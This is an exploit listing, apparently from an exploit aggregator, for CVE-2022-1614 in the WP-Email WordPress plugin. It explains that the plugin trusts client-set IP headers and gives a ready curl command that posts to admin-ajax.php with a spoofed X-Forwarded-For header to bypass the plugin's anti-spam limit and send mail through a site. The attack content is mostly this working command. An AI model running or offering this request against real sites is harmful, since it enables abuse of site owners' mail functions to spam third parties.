Exploit for WP-Email < 2.69.0 - Anti-Spam Protection Bypass via IP Spoofing CVE-2022-1614

Name: Exploit for WP-Email < 2.69.0 - Anti-Spam Protection Bypass via IP Spoofing CVE-2022-1614
Rating: 5 (65 reviews)

2022-05-30 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:A5940D0B-6B88-4418-87E2-02C0897BC2F1
Set HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR or any of the other headers used in get_ipaddress().

curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST -H 'X-Forwarded-For: 127.0.0.1' --data-raw 'action=email&yourname=admin&youremail=attack@attack.me&yourremarks=asdasd&friendname=Igor Popov&friendemail=ip@internet.com&imageverify=ME5RJ&p=177&wp-email_nonce=646bfc1f45'